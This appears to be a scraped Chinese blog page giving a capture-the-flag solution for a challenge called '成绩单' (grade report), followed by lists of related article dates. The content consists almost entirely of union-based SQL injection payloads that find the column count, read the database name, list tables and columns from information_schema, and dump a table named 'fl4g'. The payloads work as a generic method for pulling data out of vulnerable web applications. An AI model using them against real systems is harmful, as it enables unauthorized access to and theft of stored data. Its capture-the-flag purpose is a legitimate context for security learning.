成绩单

0' union select 1,2,3,4#

成绩单


0' union select 1,database(),3,4#   
成绩单


0' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='skctf_flag'#
成绩单


0' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='skctf_flag' and table_name='fl4g'#
成绩单


0' union select 1,group_concat(skctf_flag),3,4 from skctf_flag.fl4g#

成绩单

相关文章:

  • 2021-05-17
  • 2021-08-22
  • 2021-08-24
  • 2021-08-18
  • 2021-09-06
  • 2021-07-13
  • 2022-01-01
猜你喜欢
  • 2021-12-11
  • 2021-09-08
  • 2021-08-26
  • 2021-06-28
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案